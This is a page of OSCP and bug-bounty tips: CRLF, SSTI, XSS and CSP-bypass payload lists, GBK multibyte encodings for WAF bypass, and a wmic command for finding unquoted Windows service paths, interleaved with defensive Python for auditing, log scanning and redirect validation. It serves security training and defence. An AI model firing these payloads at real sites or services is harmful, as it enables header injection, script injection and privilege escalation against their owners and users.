🔥OSCP Training🔥🛡⚔️👨🏻‍💻
Offensive Security Certified Professional
Periodic reminder: it's possible to navigate sub-tabs (like Repeater entries) from the keyboard.

You simply have to configure the actions "Go to previous tab" and "Go to next tab".

Burp Suite
As Burp Suite is developed in Java, regexes may use embedded flag expressions like "(?m)"

Here's a detailed description of all the possibilities (including embedded flags, character classes, quantifiers, groups, ...)
Bug Bounty Tip

GBK Encoding / MultiByte Attack

嘊 = %E5%98%8A = \u560a ⇒ %0A
嘍 = %E5%98%8D = \u560d ⇒ %0D
嘾 = %E5%98%BE = \u563e ⇒ %3E (>)
嘼 = %E5%98%BC = \u563c ⇒ %3C (<)
嘒 = %E5%98%A2 = \u5622 ⇒ %22 (")
嘧 = %E5%98%A7 = \u5627 ⇒ %27 (')

For XSS, CRLF, WAF bypass
CSP Protection Bypass (using Google domain)

/o/oauth2/revoke?callback=alert(1);console.log
Useful for local privesc on Windows systems; find unquoted service paths using the following:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

#OSCP #Windows
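As an added example (not code from the original post), here is a Python audit script that does the same filtering as the wmic/findstr one-liner above and prints the corrected, quoted path for each finding. The wmic output embedded below is constructed for the example, the service names are fictional, and the function names are this example's own.

```python
from __future__ import annotations
import re

# Constructed sample of `wmic service get name,displayname,pathname,startmode`
# output; it is not captured from a real host. Columns are separated by runs
# of two or more spaces, as wmic prints them.
SAMPLE_WMIC = r"""
Name           DisplayName              PathName                                                 StartMode
Spooler        Print Spooler            C:\Windows\System32\spoolsv.exe                          Auto
AcmeUpdater    Acme Update Service      C:\Program Files\Acme Corp\Updater\svc.exe               Auto
AcmeAgent      Acme Agent               "C:\Program Files\Acme Corp\Agent\agent.exe" -service    Auto
LegacyBackup   Legacy Backup            C:\Tools\backup daemon\backup.exe /run                   Manual
"""

# Values may contain single spaces, so split on runs of two or more.
ROW = re.compile(
    r"^(?P<name>\S+)\s{2,}(?P<display>.+?)\s{2,}(?P<path>.+?)\s{2,}(?P<mode>\S+)\s*$"
)


def parse_wmic_services(text: str) -> list[dict]:
    """Turn wmic's column output into a list of {name, display, path, mode} dicts."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("Name "):
            continue  # blank line or the header row
        m = ROW.match(line)
        if m:
            rows.append(m.groupdict())
    return rows


def split_exe_and_args(path_value: str) -> tuple[str, str]:
    """Split an ImagePath-style value into the executable and its arguments
    (the executable is taken to end at the first '.exe')."""
    idx = path_value.lower().find(".exe")
    if idx == -1:
        return path_value, ""
    return path_value[: idx + 4], path_value[idx + 4:]


def is_unquoted_with_spaces(path_value: str) -> bool:
    """True when the executable path is not wrapped in quotes and contains a space,
    which lets the service control manager try each space-delimited prefix first."""
    p = path_value.strip()
    if p.startswith('"'):
        return False
    exe, _ = split_exe_and_args(p)
    return " " in exe


def quoted_fix(path_value: str) -> str:
    """The remediation: quote the executable part and keep the arguments as they are
    (apply it with `sc config <Name> binPath= ...` or via the service properties)."""
    exe, args = split_exe_and_args(path_value.strip())
    return f'"{exe}"{args}'


def find_unquoted_service_paths(text: str, auto_only: bool = True,
                                skip_windows_dir: bool = True) -> list[dict]:
    """Mirror the findstr chain: Auto start, outside C:\\Windows\\, no quotes."""
    findings = []
    for row in parse_wmic_services(text):
        if auto_only and row["mode"].lower() != "auto":
            continue
        if skip_windows_dir and row["path"].lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_spaces(row["path"]):
            findings.append({**row, "fix": quoted_fix(row["path"])})
    return findings


if __name__ == "__main__":
    for f in find_unquoted_service_paths(SAMPLE_WMIC):
        print(f"{f['name']}: {f['path']}\n    -> {f['fix']}")
```

Run it against saved wmic output from a build or hardening review; set auto_only=False to also list Manual services, which the one-liner above deliberately skips.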
https://portswigger.net/burp/documentation/desktop/settings/network/tls#tls-negotiation


Burp Suite 2023.10 is harder to fingerprint than earlier versions as it now sets 'Accept-Encoding: gzip, deflate, br'. If you're still blocked, you might bypass it by tinkering with your TLS ciphers using "Network->TLS -> Use custom protocols and ciphers"
Bug Bounty Tip

SSTI (Server Side Template Injection) Payload List

🔹{7*7}
🔹*{7*7}
🔹{{7*7}}
🔹[[7*7]]
🔹${7*7}
🔹@(7*7)
🔹<?=7*7?>
🔹<%= 7*7 %>
🔹${= 7*7}
🔹{{= 7*7}}
🔹${{7*7}}
🔹#{7*7}
🔹[=7*7]

If it is evaluated to 49, the target is vulnerable
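From the defender's side, these probe shapes are easy to spot in access logs. The following is an added example, not code from the original post: a small Python scanner with one regex per delimiter family in the list above, run over constructed log lines (the IP addresses, paths and function names are made up for the example). The server-side fix remains not to compile user input as a template at all; this only tells you who has been probing.

```python
from __future__ import annotations
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post); the
# query strings carry the kinds of template-expression probes listed above.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /profile?name=alice HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:12:00:02 +0000] "GET /profile?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 498
10.0.0.7 - - [10/Oct/2023:12:00:03 +0000] "GET /profile?name=%24%7B7*7%7D HTTP/1.1" 200 498
10.0.0.9 - - [10/Oct/2023:12:00:04 +0000] "GET /search?q=price%3C50 HTTP/1.1" 200 1024
10.0.0.7 - - [10/Oct/2023:12:00:05 +0000] "GET /profile?name=%3C%25%3D%207*7%20%25%3E HTTP/1.1" 200 498
10.0.0.7 - - [10/Oct/2023:12:00:06 +0000] "GET /profile?name=%23%7B7*7%7D HTTP/1.1" 200 498
"""

# Arithmetic probe body such as "7*7" or "= 7*7": digits, one operator, digits.
ARITH = r"\s*=?\s*\d+\s*[*+\-/]\s*\d+\s*"

# One pattern per delimiter family in the list above. The lookbehind on the
# single-brace form stops it from double-counting {{..}}, ${..}, #{..} and *{..}.
PROBE_PATTERNS = [
    (name, re.compile(pattern))
    for name, pattern in [
        ("double-brace", r"\{\{" + ARITH + r"\}\}"),
        ("dollar-brace", r"\$\{\{?" + ARITH + r"\}\}?"),
        ("hash-brace", r"#\{" + ARITH + r"\}"),
        ("star-brace", r"\*\{" + ARITH + r"\}"),
        ("single-brace", r"(?<![{$#*])\{" + ARITH + r"\}"),
        ("erb-tag", r"<%=" + ARITH + r"%>"),
        ("php-short-tag", r"<\?=" + ARITH + r"\?>"),
        ("razor-paren", r"@\(" + ARITH + r"\)"),
        ("double-bracket", r"\[\[" + ARITH + r"\]\]"),
        ("bracket-eq", r"\[=" + ARITH + r"\]"),
    ]
]

# Request target between the method and the protocol in a combined-format log line.
LOG_REQUEST = re.compile(r'"(?:GET|POST|PUT|PATCH|DELETE|HEAD|OPTIONS) (\S+) HTTP/')


def probe_families(target: str) -> list[str]:
    """Names of the probe families present in a percent-encoded request target."""
    decoded = unquote(target)  # probes normally arrive URL-encoded
    return [name for name, pattern in PROBE_PATTERNS if pattern.search(decoded)]


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client, request target, families) for every request carrying a probe."""
    hits = []
    for line in text.splitlines():
        m = LOG_REQUEST.search(line)
        if not m:
            continue
        families = probe_families(m.group(1))
        if families:
            hits.append((line.split(" ", 1)[0], m.group(1), families))
    return hits


if __name__ == "__main__":
    for client, target, families in scan_log(SAMPLE_LOG):
        print(f"{client} {target} -> {', '.join(families)}")
```

Legitimate input can contain braces, so the arithmetic body is what keeps the false-positive rate down; widen ARITH only if you are prepared to review more hits by hand.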
Bug Bounty Tip

When the app only accepts URLs with a specific scheme, try injecting javascript://test.com

Then, use these symbols to craft an XSS payload:
🔹%0a
🔹%0d
🔹%E2%80%A8
🔹%E2%80%A9

✅ javascript://test.com%0aalert(1)
CRLF Payload List

🔹 /%%0a0aSet-Cookie:crlf
🔹 /%0aSet-Cookie:crlf
🔹 /%0d%0aSet-Cookie:crlf
🔹 /%0dSet-Cookie:crlf
🔹 /%23%0aSet-Cookie:crlf
🔹 /%23%0d%0aSet-Cookie:crlf
🔹 /%23%0dSet-Cookie:crlf
🔹 /%25%30%61Set-Cookie:crlf
🔹 /%25%30aSet-Cookie:crlf
🔹 /%250aSet-Cookie:crlf
🔹 /%25250aSet-Cookie:crlf
🔹 /%2e%2e%2f%0d%0aSet-Cookie:crlf
🔹 /%2f%2e%2e%0d%0aSet-Cookie:crlf
🔹 /%2F..%0d%0aSet-Cookie:crlf
🔹 /%3f%0d%0aSet-Cookie:crlf
🔹 /%3f%0dSet-Cookie:crlf
🔹 /%u000aSet-Cookie:crlf
🔹 /%E5%98%8D%E5%98%8ASet-Cookie:crlf
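The CRLF list above, the javascript:// scheme trick and the multibyte table earlier on this page all come down to one validation gap: a value is checked before it is fully decoded, or is converted lossily after the check. Below is an added example (not from the original post) of a Python validator for a user-supplied redirect target that is about to land in a Location header. It decodes until stable (including the IIS-style %uXXXX form), rejects CR, LF and U+2028/U+2029, rejects anything that a lossy narrowing layer would turn into CR/LF, and allowlists the scheme. The lossy_narrow helper is an assumption about the conversion class behind the table (keep only the low byte of each code point, which is exactly what the table's columns show); the function names, sample inputs and scheme policy are this example's own.

```python
from __future__ import annotations
import re
from urllib.parse import unquote, urlsplit

# Characters that terminate a header line or a JavaScript string/line:
# CR, LF and the Unicode line/paragraph separators U+2028/U+2029
# (%E2%80%A8 / %E2%80%A9 in the list above are their UTF-8 encodings).
LINE_BREAKERS = {"\r", "\n", "\u2028", "\u2029"}
ALLOWED_SCHEMES = {"http", "https"}  # assumed policy for this example


def lossy_narrow(text: str) -> str:
    """Simulate the conversion class behind the multibyte table: a layer that keeps
    only the low byte of each code point, so U+560A (嘊) becomes 0x0A and U+563E (嘾)
    becomes '>'. A correct conversion raises or substitutes instead of truncating."""
    return "".join(chr(ord(ch) & 0xFF) for ch in text)


def canonical_decode(raw: str, max_rounds: int = 4) -> str:
    """Percent-decode until the value stops changing (bounded), expanding %uXXXX first,
    so %250a and %25250a are judged by the LF they become after later decodes."""
    value = raw
    for _ in range(max_rounds):
        step = re.sub(r"%u([0-9a-fA-F]{4})",
                      lambda m: chr(int(m.group(1), 16)), value)
        step = unquote(step)
        if step == value:
            break
        value = step
    return value


def validate_redirect_target(raw: str) -> tuple[bool, str]:
    """Return (ok, reason) for a redirect target before it is written to Location."""
    decoded = canonical_decode(raw)
    if any(ch in LINE_BREAKERS for ch in decoded):
        return False, "line break after decoding"
    if any(ch in LINE_BREAKERS for ch in lossy_narrow(decoded)):
        return False, "code point that narrows to CR/LF"
    if any(not (0x20 <= ord(ch) <= 0x7E) for ch in decoded):
        return False, "non-printable or non-ASCII character"
    scheme = urlsplit(decoded).scheme.lower()
    if scheme and scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: two benign targets, then shapes from the lists on this page.
    for sample in ("https://example.com/login?next=%2Fhome", "/account",
                   "javascript://test.com", "javascript://test.com%0aalert(1)",
                   "/%25250aSet-Cookie:crlf", "/%u000aSet-Cookie:crlf",
                   "/%E5%98%8D%E5%98%8ASet-Cookie:crlf"):
        print(f"{sample!r}: {validate_redirect_target(sample)}")
```

Validate on the decoded form and then re-encode on output; checking the raw string once is what lets the double-encoded and %u variants through. Most frameworks already refuse CR/LF in header values, so the narrowing and scheme checks are what this adds on top.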
Bug Bounty Reminder

Don't forget about the <math> element for XSS WAF bypass in Firefox.

<math>
<xss href="javascript:alert(31337)">
Click Me
</xss>
</math>

The <math> element can make any HTML element inside it clickable.